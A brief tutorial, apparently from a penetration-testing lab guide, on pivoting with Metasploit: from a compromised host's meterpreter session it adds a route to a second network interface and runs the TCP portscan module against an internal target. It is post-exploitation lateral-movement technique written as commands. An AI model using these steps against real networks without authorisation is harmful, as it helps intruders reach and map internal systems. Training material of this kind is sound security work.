Pivoting on Metasploit
Check the IP address of the compromised machine in meterpreter
shell
ip addr
We have another network interface.
Now we can add it to meterpreter route.
run autoroute -s 192.6.101.2
Background the current meterpreter session and use the portscan tcp module of Metasploit to scan the second target machine.
Press CTRL+z and Enter y to background the meterpreter session.
use auxiliary/scanner/portscan/tcp
set RHOSTS 192.180.108.3
set verbose false
set ports 1-1000
exploit
Last updated